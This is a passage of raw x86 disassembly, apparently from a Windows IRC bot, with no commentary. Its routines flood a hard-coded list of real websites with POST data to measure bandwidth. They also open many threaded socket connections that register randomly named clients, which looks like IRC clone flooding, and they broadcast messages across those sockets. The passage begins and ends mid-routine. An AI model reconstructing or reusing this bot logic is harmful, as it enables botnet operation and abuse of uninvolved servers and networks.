call sub_429760
push [ebp+arg_0]
mov [ebp+var_28], 2
call sub_41E3EC
add esp, 10h
cmp eax, 0FFFFFFFFh
mov [ebp+var_24], eax
jz loc_425FF6
push 50h
call dword_456F38 ; ntohs
push 6
push 1
push 2
mov [ebp+var_26], ax
call dword_456FD0 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_425FF6
lea ecx, [ebp+var_28]
push 10h
push ecx
push eax
call dword_456EBC ; connect
cmp eax, 0FFFFFFFFh
jz loc_425FF6
push 32003h
call sub_4297B8
mov ebx, dword_437188
mov edi, eax
pop ecx
mov [ebp+var_10], edi
call ebx ; dword_437188
push eax
call sub_429B8F
call sub_429B9C
cdq
mov ecx, 0FFh
mov [esp+38h+var_38], 32001h
idiv ecx
push 0
push edi
movsx esi, dl
call sub_429760
push 32000h
push esi
push edi
call sub_429760
push edi
call sub_4293A0
push 323EAh
mov [ebp+var_8], eax
call sub_4297B8
push [ebp+var_8]
mov esi, eax
push [ebp+arg_0]
push offset aPostHttp1_1Hos ; "POST / HTTP/1.1\r\nHost: %s\r\nContent-Leng"...
push esi
call sub_429B03
add esp, 30h
push edi
mov edi, dword_437090
push esi
call edi ; dword_437090
push offset asc_4476D0 ; "\r\n"
push esi
call edi ; dword_437090
push esi
call sub_4293A0
mov edi, eax
pop ecx
mov [ebp+var_8], edi
call ebx ; dword_437188
mov dword ptr [ebp+var_18+4], eax
xor eax, eax
test edi, edi
mov [ebp+arg_0], eax
jbe short loc_425F74
mov [ebp+var_C], edi
mov edi, 400h
jmp short loc_425F44
; ---------------------------------------------------------------------------
loc_425F41: ; CODE XREF: sub_425E18+15A�j
mov eax, [ebp+arg_0]
loc_425F44: ; CODE XREF: sub_425E18+127�j
mov ecx, [ebp+var_8]
push 0
sub ecx, eax
add eax, esi
cmp ecx, edi
jnb short loc_425F56
push [ebp+var_C]
jmp short loc_425F57
; ---------------------------------------------------------------------------
loc_425F56: ; CODE XREF: sub_425E18+137�j
push edi
loc_425F57: ; CODE XREF: sub_425E18+13C�j
push eax
push [ebp+var_4]
call dword_456F8C ; send
cmp eax, 0FFFFFFFFh
jz short loc_425FDD
add [ebp+arg_0], edi
sub [ebp+var_C], edi
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_8]
jb short loc_425F41
loc_425F74: ; CODE XREF: sub_425E18+11D�j
call ebx ; dword_437188
sub eax, dword ptr [ebp+var_18+4]
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
fmul flt_437354
fst [ebp+arg_0]
fcomp flt_437350
fnstsw ax
test ah, 44h
jp short loc_425F9E
fld1
fstp [ebp+arg_0]
loc_425F9E: ; CODE XREF: sub_425E18+17F�j
push [ebp+var_4]
call dword_456FF0 ; closesocket
push [ebp+var_10]
call sub_4298F2
push esi
call sub_4298F2
mov eax, [ebp+var_8]
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
pop ecx
fild [ebp+var_18]
pop ecx
fdiv [ebp+arg_0]
fmul flt_43734C
fmul flt_437348
call sub_42A9E0
loc_425FD8: ; CODE XREF: sub_425E18+1E0�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_425FDD: ; CODE XREF: sub_425E18+14C�j
push [ebp+var_4]
call dword_456FF0 ; closesocket
push [ebp+var_10]
call sub_4298F2
push esi
call sub_4298F2
pop ecx
pop ecx
loc_425FF6: ; CODE XREF: sub_425E18+17�j
; sub_425E18+41�j ...
xor eax, eax
jmp short loc_425FD8
sub_425E18 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425FFA proc near ; DATA XREF: sub_40A9FE+166C�o
var_134 = dword ptr -134h
var_130 = byte ptr -130h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 134h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 26h
mov esi, eax
pop ecx
lea edi, [ebp+var_134]
rep movsd
mov dword ptr [eax+94h], 1
mov eax, [ebp+var_134]
mov [ebp+arg_0], eax
mov [ebp+var_4], 3
mov [ebp+var_9C], offset aWww_schlund_ne ; "www.schlund.net"
mov [ebp+var_98], offset aWww_utwente_nl ; "www.utwente.nl"
mov [ebp+var_94], offset aWww_news_nl ; "www.news.nl"
mov [ebp+var_90], offset aWww_volkskrant ; "www.volkskrant.nl"
mov [ebp+var_8C], offset aVerio_fr ; "verio.fr"
mov [ebp+var_88], offset aWww_univAngers ; "www.univ-angers.fr"
mov [ebp+var_84], offset aWww_uniTuebing ; "www.uni-tuebingen.de"
mov [ebp+var_80], offset aWww_rollingsto ; "www.rollingstone.de"
mov [ebp+var_7C], offset aWww_rtv_de ; "www.rtv.de"
mov [ebp+var_78], offset aWww_1und1_de ; "www.1und1.de"
mov [ebp+var_74], offset aWww_switch_ch ; "www.switch.ch"
mov [ebp+var_70], offset aWww_hon_ch ; "www.hon.ch"
mov [ebp+var_6C], offset aWww_epfl_ch ; "www.epfl.ch"
mov [ebp+var_68], offset aWww_supergames ; "www.supergames.cz"
mov [ebp+var_64], offset aWww_nintendoEu ; "www.nintendo-europe.com"
mov [ebp+var_60], offset aWww_google_com ; "www.google.com"
mov [ebp+var_5C], offset aWww_xo_net ; "www.xo.net"
mov [ebp+var_58], offset aWww_stanford_e ; "www.stanford.edu"
mov [ebp+var_54], offset aWww_nocster_co ; "www.nocster.com"
mov [ebp+var_50], offset aWww_rit_edu ; "www.rit.edu"
mov [ebp+var_4C], offset aWww_cogentco_c ; "www.cogentco.com"
mov [ebp+var_48], offset aWww_burst_net ; "www.burst.net"
mov [ebp+var_44], offset aWww_level3_com ; "www.level3.com"
mov [ebp+var_40], offset aWww_above_net ; "www.above.net"
mov [ebp+var_3C], offset aWww_easynews_c ; "www.easynews.com"
mov [ebp+var_38], offset aWww_apple_com ; "www.apple.com"
mov [ebp+var_34], offset aWww_nintendo_c ; "www.nintendo.com"
mov [ebp+var_30], offset aGamearena_com_ ; "gamearena.com.au"
mov [ebp+var_2C], offset aWww_conexim_co ; "www.conexim.com.au"
mov [ebp+var_28], offset aUnimelb_edu_au ; "unimelb.edu.au"
mov [ebp+var_24], offset aWww_umin_ac_jp ; "www.umin.ac.jp"
mov [ebp+var_20], offset aWww_lib_nthu_e ; "www.lib.nthu.edu.tw"
mov [ebp+var_1C], offset aWww_nthu_edu_t ; "www.nthu.edu.tw"
mov [ebp+var_18], offset aWww_nintendo_0 ; "www.nintendo.co.jp"
mov [ebp+var_14], offset aWww_seikoWatch ; "www.seiko-watch.co.jp"
mov [ebp+var_10], offset aWww_bandai_co_ ; "www.bandai.co.jp"
mov [ebp+var_C], offset aWww_pku_edu_cn ; "www.pku.edu.cn"
mov [ebp+var_8], offset aWww_kaist_ac_k ; "www.kaist.ac.kr"
call sub_429B9C
push 0Fh
xor edx, edx
pop ecx
div ecx
push [ebp+edx*4+var_9C]
call sub_425E18
mov esi, eax
call sub_429B9C
push 0Fh
xor edx, edx
pop ecx
div ecx
push [ebp+edx*4+var_9C]
call sub_425E18
pop ecx
test esi, esi
pop ecx
jz short loc_426196
test eax, eax
jz short loc_426192
lea ebx, [eax+esi]
shr ebx, 1
jmp short loc_426198
; ---------------------------------------------------------------------------
loc_426192: ; CODE XREF: sub_425FFA+18F�j
mov ebx, esi
jmp short loc_426198
; ---------------------------------------------------------------------------
loc_426196: ; CODE XREF: sub_425FFA+18B�j
mov ebx, eax
loc_426198: ; CODE XREF: sub_425FFA+196�j
; sub_425FFA+19A�j
call sub_429B9C
push 0Ch
xor edx, edx
pop ecx
div ecx
push [ebp+edx*4+var_60]
call sub_425E18
mov edi, eax
call sub_429B9C
push 0Ch
xor edx, edx
pop ecx
div ecx
push [ebp+edx*4+var_60]
call sub_425E18
pop ecx
test edi, edi
pop ecx
jz short loc_4261D9
test eax, eax
jz short loc_4261D5
lea esi, [eax+edi]
shr esi, 1
jmp short loc_4261DB
; ---------------------------------------------------------------------------
loc_4261D5: ; CODE XREF: sub_425FFA+1D2�j
mov esi, edi
jmp short loc_4261DB
; ---------------------------------------------------------------------------
loc_4261D9: ; CODE XREF: sub_425FFA+1CE�j
mov esi, eax
loc_4261DB: ; CODE XREF: sub_425FFA+1D9�j
; sub_425FFA+1DD�j
call sub_429B9C
push 0Bh
xor edx, edx
pop ecx
div ecx
push [ebp+edx*4+var_30]
call sub_425E18
mov edi, eax
call sub_429B9C
push 0Bh
xor edx, edx
pop ecx
div ecx
push [ebp+edx*4+var_30]
call sub_425E18
pop ecx
test edi, edi
pop ecx
jz short loc_42621C
test eax, eax
jz short loc_426218
lea ecx, [eax+edi]
shr ecx, 1
jmp short loc_42621E
; ---------------------------------------------------------------------------
loc_426218: ; CODE XREF: sub_425FFA+215�j
mov ecx, edi
jmp short loc_42621E
; ---------------------------------------------------------------------------
loc_42621C: ; CODE XREF: sub_425FFA+211�j
mov ecx, eax
loc_42621E: ; CODE XREF: sub_425FFA+21C�j
; sub_425FFA+220�j
test ebx, ebx
jnz short loc_426233
test esi, esi
jnz short loc_426233
test ecx, ecx
jnz short loc_426233
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_426233: ; CODE XREF: sub_425FFA+226�j
; sub_425FFA+22A�j ...
xor eax, eax
test ebx, ebx
jz short loc_426240
mov edi, [ebp+var_4]
mov eax, ebx
jmp short loc_426243
; ---------------------------------------------------------------------------
loc_426240: ; CODE XREF: sub_425FFA+23D�j
push 2
pop edi
loc_426243: ; CODE XREF: sub_425FFA+244�j
test esi, esi
jz short loc_42624B
add eax, esi
jmp short loc_42624C
; ---------------------------------------------------------------------------
loc_42624B: ; CODE XREF: sub_425FFA+24B�j
dec edi
loc_42624C: ; CODE XREF: sub_425FFA+24F�j
test ecx, ecx
jz short loc_426254
add eax, ecx
jmp short loc_426255
; ---------------------------------------------------------------------------
loc_426254: ; CODE XREF: sub_425FFA+254�j
dec edi
loc_426255: ; CODE XREF: sub_425FFA+258�j
xor edx, edx
div edi
cmp [ebp+var_AC], 0
push eax
push ecx
push esi
push ebx
lea eax, [ebp+var_130]
push offset a7_pak0onymn7ra ; "7.PaK0OnymN/7Razv/1FefF."
push offset aSEuropeDKbitSU ; "%s ~ Europe[%d kbit/s] ~ USA[%d kbit/s]"...
push eax
push [ebp+arg_0]
jnz short loc_426281
call sub_41CE4A
jmp short loc_426286
; ---------------------------------------------------------------------------
loc_426281: ; CODE XREF: sub_425FFA+27E�j
call sub_41CDD4
loc_426286: ; CODE XREF: sub_425FFA+285�j
add esp, 20h
push [ebp+var_B0]
call sub_423623
pop ecx
push 0
call dword_437174 ; ExitThread
sub_425FFA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42629D proc near ; CODE XREF: sub_42045F+46C�p
; sub_4264CB+2F�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push 0
push 1
push 2
call dword_456FD0 ; socket
mov edi, eax
or esi, 0FFFFFFFFh
cmp edi, esi
jz short loc_426319
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_429760
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+arg_4]
call dword_456F38 ; ntohs
push [ebp+arg_0]
mov [ebp+var_E], ax
call dword_456F7C ; inet_addr
cmp eax, esi
jnz short loc_4262FE
push [ebp+arg_0]
call dword_456FD4 ; gethostbyname
test eax, eax
jz short loc_426319
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
loc_4262FE: ; CODE XREF: sub_42629D+4B�j
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call dword_456EBC ; connect
cmp eax, esi
jnz short loc_42631D
push edi
call dword_456FF0 ; closesocket
loc_426319: ; CODE XREF: sub_42629D+1B�j
; sub_42629D+58�j
mov eax, esi
jmp short loc_42631F
; ---------------------------------------------------------------------------
loc_42631D: ; CODE XREF: sub_42629D+73�j
mov eax, edi
loc_42631F: ; CODE XREF: sub_42629D+7E�j
pop edi
pop esi
leave
retn
sub_42629D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426323 proc near ; CODE XREF: sub_40A9FE+3C9A�p
; sub_40A9FE+3CA7�p
var_40 = byte ptr -40h
var_36 = byte ptr -36h
push ebp
mov ebp, esp
sub esp, 40h
push ebx
push esi
push edi
push 0C8h
mov ebx, offset byte_660800
push 0
push ebx
call sub_429760
push 10h
mov esi, offset a0123456789abcd ; "0123456789ABCDEFGHIJKLMNOPQRSTUVWXWYZab"...
pop ecx
lea edi, [ebp+var_40]
lea eax, [ebp+var_40]
rep movsd
push eax
call sub_4293A0
add esp, 10h
mov edi, eax
xor esi, esi
loc_42635B: ; CODE XREF: sub_426323+62�j
call sub_429B9C
test esi, esi
cdq
jz short loc_426373
idiv edi
mov al, [ebp+edx+var_40]
mov byte_660800[esi], al
jmp short loc_426381
; ---------------------------------------------------------------------------
loc_426373: ; CODE XREF: sub_426323+40�j
lea ecx, [edi-0Ah]
idiv ecx
mov al, [ebp+edx+var_36]
mov byte_660800, al
loc_426381: ; CODE XREF: sub_426323+4E�j
inc esi
cmp esi, 67h
jl short loc_42635B
pop edi
mov eax, ebx
pop esi
pop ebx
leave
retn
sub_426323 endp
; =============== S U B R O U T I N E =======================================
sub_42638E proc near ; CODE XREF: sub_40A9FE+2BE2�p
; sub_40A9FE+2C90�p ...
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push offset asc_440D90 ; "\n"
push edi
call sub_42A5E0
pop ecx
mov esi, offset dword_6608CC
pop ecx
loc_4263A6: ; CODE XREF: sub_42638E+42�j
cmp dword ptr [esi-4], 1
jnz short loc_4263C4
cmp dword ptr [esi], 0
jbe short loc_4263C4
push 0
push edi
call sub_4293A0
pop ecx
push eax
push edi
push dword ptr [esi]
call dword_456F8C ; send
loc_4263C4: ; CODE XREF: sub_42638E+1C�j
; sub_42638E+21�j
add esi, 410h
cmp esi, offset dword_66D3EC
jl short loc_4263A6
pop edi
pop esi
retn
sub_42638E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4263D5 proc near ; CODE XREF: sub_4264CB+1B8�p
var_420 = byte ptr -420h
var_220 = byte ptr -220h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 420h
push ebx
push esi
mov esi, offset asc_43D938 ; " "
push edi
push esi
push [ebp+arg_0]
call sub_429C5E
xor edi, edi
pop ecx
inc edi
pop ecx
mov [ebp+var_20], eax
xor ebx, ebx
loc_4263F9: ; CODE XREF: sub_4263D5+35�j
push esi
push ebx
call sub_429C5E
mov [ebp+edi*4+var_20], eax
inc edi
pop ecx
cmp edi, 8
pop ecx
jl short loc_4263F9
cmp [ebp+var_20], ebx
mov edi, [ebp+var_1C]
jnz short loc_426420
cmp edi, ebx
jnz short loc_426420
xor eax, eax
inc eax
jmp loc_4264C6
; ---------------------------------------------------------------------------
loc_426420: ; CODE XREF: sub_4263D5+3D�j
; sub_4263D5+41�j
push [ebp+var_20]
mov esi, dword_437178
push offset aSpxmrGVbi0 ; "spxMr/G/vBI0"
call esi ; dword_437178
test eax, eax
push edi
jnz short loc_426450
push offset a2nru_kpknx ; "/2nRu.KpKNx/"
lea eax, [ebp+var_220]
push offset aSS_0 ; "%s %s\n"
push eax
call sub_429B03
add esp, 10h
jmp short loc_4264A5
; ---------------------------------------------------------------------------
loc_426450: ; CODE XREF: sub_4263D5+5E�j
push offset a433 ; "433"
call esi ; dword_437178
test eax, eax
jz short loc_426467
push edi
push offset a432 ; "432"
call esi ; dword_437178
test eax, eax
jnz short loc_4264C4
loc_426467: ; CODE XREF: sub_4263D5+84�j
push 200h
lea eax, [ebp+var_420]
push ebx
push eax
call sub_429760
lea eax, [ebp+var_420]
push eax
call sub_426761
lea eax, [ebp+var_420]
push eax
push offset aTugnf_mqsdr0 ; "TuGNF.mQSDR0"
lea eax, [ebp+var_220]
push offset aSS_0 ; "%s %s\n"
push eax
call sub_429B03
add esp, 20h
loc_4264A5: ; CODE XREF: sub_4263D5+79�j
lea eax, [ebp+var_220]
push ebx
push eax
call sub_4293A0
pop ecx
push eax
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
call dword_456F8C ; send
loc_4264C4: ; CODE XREF: sub_4263D5+90�j
xor eax, eax
loc_4264C6: ; CODE XREF: sub_4263D5+46�j
pop edi
pop esi
pop ebx
leave
retn
sub_4263D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4264CB proc near ; DATA XREF: sub_4266D3+71�o
var_4008 = byte ptr -4008h
var_3008 = byte ptr -3008h
var_2008 = byte ptr -2008h
var_1008 = byte ptr -1008h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 4008h
call sub_429B60
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
imul esi, 410h
xor edi, edi
push dword_660AD4[esi]
lea eax, dword_6608D4[esi]
inc edi
push eax
mov dword_6608C8[esi], edi
call sub_42629D
pop ecx
xor ebx, ebx
cmp eax, edi
pop ecx
mov dword_6608CC[esi], eax
jb loc_4266B3
mov edi, 1000h
lea eax, [ebp+var_2008]
push edi
push ebx
push eax
call sub_429760
add esp, 0Ch
call dword_437188 ; GetTickCount
push eax
call sub_429B8F
lea eax, [ebp+var_2008]
push eax
call sub_426761
lea eax, [ebp+var_4008]
push eax
call sub_426761
lea eax, [ebp+var_3008]
push eax
call sub_426761
lea eax, dword_660AD8[esi]
push eax
push offset a7lybp1gunfm0_0 ; "7LybP1GuNfm0"
lea eax, [ebp+var_1008]
push offset aSS_0 ; "%s %s\n"
push eax
call sub_429B03
add esp, 20h
lea eax, [ebp+var_1008]
push ebx
push eax
call sub_4293A0
pop ecx
push eax
lea eax, [ebp+var_1008]
push eax
push dword_6608CC[esi]
call dword_456F8C ; send
push edi
lea eax, [ebp+var_1008]
push ebx
push eax
call sub_429760
lea eax, [ebp+var_3008]
push eax
lea eax, [ebp+var_4008]
push eax
lea eax, [ebp+var_2008]
push offset a391myLxl28__0 ; "391mY/LxL28."
push eax
push offset aTugnf_mqsdr0 ; "TuGNF.mQSDR0"
lea eax, [ebp+var_1008]
push offset aSSSSMail_gmail ; "%s %s\n%s %s \"mail.gmail.com\" \"127.0.0.1"...
push eax
call sub_429B03
add esp, 28h
lea eax, [ebp+var_1008]
push ebx
push eax
call sub_4293A0
pop ecx
push eax
lea eax, [ebp+var_1008]
push eax
push dword_6608CC[esi]
call dword_456F8C ; send
push edi
lea eax, [ebp+var_1008]
push ebx
push eax
call sub_429760
add esp, 0Ch
loc_42660D: ; CODE XREF: sub_4264CB+1E3�j
push edi
lea eax, [ebp+var_1008]
push ebx
push eax
call sub_429760
add esp, 0Ch
lea eax, [ebp+var_1008]
push ebx
push edi
push eax
push dword_6608CC[esi]
call dword_456F58 ; recv
cmp eax, ebx
mov [ebp+var_8], eax
jle short loc_4266B3
xor eax, eax
cmp [ebp+var_8], ebx
jmp short loc_4266A9
; ---------------------------------------------------------------------------
loc_426641: ; CODE XREF: sub_4264CB+1E1�j
mov al, [ebp+eax+var_1008]
cmp al, 0Dh
jz short loc_426668
cmp al, 0Ah
jz short loc_426668
cmp [ebp+arg_0], 0FA0h
jz short loc_426668
mov ecx, [ebp+arg_0]
inc [ebp+arg_0]
mov [ebp+ecx+var_2008], al
jmp short loc_4266A2
; ---------------------------------------------------------------------------
loc_426668: ; CODE XREF: sub_4264CB+17F�j
; sub_4264CB+183�j ...
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_4266A2
push dword_6608CC[esi]
mov [ebp+eax+var_2008], bl
lea eax, [ebp+var_2008]
push eax
call sub_4263D5
pop ecx
test eax, eax
pop ecx
ja short loc_4266B3
push edi
lea eax, [ebp+var_2008]
push ebx
push eax
call sub_429760
add esp, 0Ch
mov [ebp+arg_0], ebx
loc_4266A2: ; CODE XREF: sub_4264CB+19B�j
; sub_4264CB+1A2�j
mov eax, [ebp+var_4]
inc eax
cmp eax, [ebp+var_8]
loc_4266A9: ; CODE XREF: sub_4264CB+174�j
mov [ebp+var_4], eax
jnz short loc_426641
jmp loc_42660D
; ---------------------------------------------------------------------------
loc_4266B3: ; CODE XREF: sub_4264CB+40�j
; sub_4264CB+16D�j ...
mov dword_6608C8[esi], ebx
mov esi, dword_6608CC[esi]
cmp esi, ebx
jbe short loc_4266CA
push esi
call dword_456FF0 ; closesocket
loc_4266CA: ; CODE XREF: sub_4264CB+1F6�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_4264CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4266D3 proc near ; CODE XREF: sub_40A9FE+2AA8�p
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
cmp [ebp+arg_8], 0
push ebx
push esi
push edi
jle short loc_42675C
mov edi, dword_4370B4
loc_4266EB: ; CODE XREF: sub_4266D3+87�j
xor ebx, ebx
mov eax, offset dword_6608C8
loc_4266F2: ; CODE XREF: sub_4266D3+2F�j
cmp dword ptr [eax], 0
jz short loc_426704
add eax, 410h
inc ebx
cmp eax, offset byte_66D3E8
jl short loc_4266F2
loc_426704: ; CODE XREF: sub_4266D3+22�j
cmp ebx, 31h
jz short loc_42675C
mov esi, ebx
push [ebp+arg_0]
imul esi, 410h
lea eax, dword_6608D4[esi]
push eax
call edi ; dword_4370B4
mov eax, [ebp+arg_4]
push [ebp+arg_C]
mov dword_660AD4[esi], eax
lea eax, dword_660AD8[esi]
push eax
call edi ; dword_4370B4
lea eax, [ebp+var_8]
mov dword_6608C8[esi], 1
push eax
xor eax, eax
push eax
push ebx
push offset sub_4264CB
push eax
push eax
call dword_437180 ; CreateThread
inc [ebp+var_4]
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_8]
jl short loc_4266EB
loc_42675C: ; CODE XREF: sub_4266D3+10�j
; sub_4266D3+34�j
pop edi
pop esi
pop ebx
leave
retn
sub_4266D3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426761 proc near ; CODE XREF: sub_40A9FE+31D4�p
; sub_40A9FE+3F31�p ...
var_40 = byte ptr -40h
var_2D = byte ptr -2Dh
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 40h
push 14h
lea eax, [ebp+var_2C]
push 0
push eax
call sub_429760
add esp, 0Ch
call dword_437188 ; GetTickCount
push eax
call sub_429B8F
pop ecx
call sub_429B9C
mov [ebp+var_4], eax
fild [ebp+var_4]
fmul dbl_437398
call sub_42A9E0
cmp eax, 1
jnz short loc_4267B8
call sub_429B9C
call sub_429B9C
push 67h
cdq
pop ecx
idiv ecx
push off_44F6A0[edx*4]
jmp short loc_4267D1
; ---------------------------------------------------------------------------
loc_4267B8: ; CODE XREF: sub_426761+3C�j
call sub_429B9C
call sub_429B9C
cdq
mov ecx, 0DFh
idiv ecx
push off_44F320[edx*4]
loc_4267D1: ; CODE XREF: sub_426761+55�j
lea eax, [ebp+var_2C]
push eax
call dword_4370B4 ; lstrcpyA
push ebx
push esi
lea eax, [ebp+var_2C]
push edi
push eax
call sub_4293A0
pop ecx
mov ebx, eax
push 13h
mov [ebp+var_4], ebx
pop eax
sub eax, ebx
mov dword ptr [ebp+var_18+4], eax
call sub_429B9C
mov dword ptr [ebp+var_10+4], eax
fild dword ptr [ebp+var_10+4]
fmul dbl_437390
call sub_42A9E0
mov esi, eax
call sub_429B9C
mov dword ptr [ebp+var_10+4], eax
fild dword ptr [ebp+var_10+4]
fimul [ebp+var_4]
fmul dbl_437388
call sub_42A9E0
cmp ebx, 2
mov edi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz1234567890-|`"...
jle short loc_426843
cmp ebx, 3
jnz short loc_42683A
cmp esi, 1
jz short loc_426843
loc_42683A: ; CODE XREF: sub_426761+D2�j
cmp eax, 1
jnz loc_4268FC
loc_426843: ; CODE XREF: sub_426761+CD�j
; sub_426761+D7�j
call sub_429B9C
mov dword ptr [ebp+var_10+4], eax
fild dword ptr [ebp+var_10+4]
fmul dbl_437380
call sub_42A9E0
push off_44F6A0[eax*4]
lea eax, [ebp+var_40]
push eax
call dword_4370B4 ; lstrcpyA
lea esi, [ebp+ebx+var_2C]
movsx eax, byte ptr [esi-1]
push eax
push edi
call sub_42B1A0
pop ecx
test eax, eax
pop ecx
jnz short loc_4268E9
movsx eax, [ebp+var_40]
push eax
push edi
call sub_42B1A0
pop ecx
test eax, eax
pop ecx
jnz short loc_4268E9
call sub_429B9C
mov dword ptr [ebp+var_10+4], eax
dec ebx
fild dword ptr [ebp+var_10+4]
mov dword ptr [ebp+var_10+4], ebx
fild dword ptr [ebp+var_10+4]
fmulp st(1), st
fmul dbl_437388
call sub_42A9E0
cmp eax, 1
jnz short loc_4268E9
push edi
call sub_4293A0
and dword ptr [ebp+var_10+4], 0
mov dword ptr [ebp+var_10], eax
fild [ebp+var_10]
pop ecx
fstp qword ptr [ebp-8]
call sub_429B9C
mov dword ptr [ebp+var_10+4], eax
fild dword ptr [ebp+var_10+4]
fmul qword ptr [ebp-8]
fmul dbl_437388
call sub_42A9E0
mov al, byte ptr aAbcdefghijkl_0[eax] ; "abcdefghijklmnopqrstuvwxyz1234567890-|`"...
mov [esi], al
loc_4268E9: ; CODE XREF: sub_426761+11C�j
; sub_426761+12D�j ...
push dword ptr [ebp+var_18+4]
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_2C]
push eax
call sub_4299E0
add esp, 0Ch
loc_4268FC: ; CODE XREF: sub_426761+DC�j
lea eax, [ebp+var_2C]
push eax
call sub_4293A0
mov esi, eax
mov [ebp+var_4], esi
movsx eax, [ebp+esi+var_2D]
push eax
call sub_42C524
pop ecx
test eax, eax
pop ecx
jnz loc_426B53
movsx eax, [ebp+esi+var_2D]
push eax
push edi
xor ebx, ebx
call sub_42B1A0
pop ecx
test eax, eax
pop ecx
jnz loc_426A55
call sub_429B9C
mov dword ptr [ebp+var_18+4], eax
lea eax, [esi+3]
fild dword ptr [ebp+var_18+4]
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmulp st(1), st
fmul dbl_437388
call sub_42A9E0
cmp esi, 3
jz short loc_426966
cmp eax, 1
jnz loc_426A55
loc_426966: ; CODE XREF: sub_426761+1FA�j
push 2
cdq
pop ecx
idiv ecx
cmp edx, 1
jnz short loc_4269AA
push edi
call sub_4293A0
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
pop ecx
fstp [ebp+var_10]
call sub_429B9C
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul [ebp+var_10]
fmul dbl_437388
call sub_42A9E0
mov al, byte ptr aAbcdefghijkl_0[eax] ; "abcdefghijklmnopqrstuvwxyz1234567890-|`"...
mov [ebp+esi+var_2C], al
jmp short loc_4269C8
; ---------------------------------------------------------------------------
loc_4269AA: ; CODE XREF: sub_426761+20E�j
call sub_429B9C
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_437378
call sub_42A9E0
mov cl, 41h
sub cl, al
mov [ebp+esi+var_2C], cl
loc_4269C8: ; CODE XREF: sub_426761+247�j
inc esi
xor ebx, ebx
mov [ebp+var_4], esi
inc ebx
call sub_429B9C
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_437370
call sub_42A9E0
cmp esi, 3
jz short loc_4269EE
cmp eax, ebx
jnz short loc_426A55
loc_4269EE: ; CODE XREF: sub_426761+287�j
push 2
pop ebx
cdq
mov ecx, ebx
idiv ecx
test edx, edx
jnz short loc_426A33
push edi
call sub_4293A0
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
pop ecx
fstp [ebp+var_10]
call sub_429B9C
mov dword ptr [ebp+var_18+4], eax
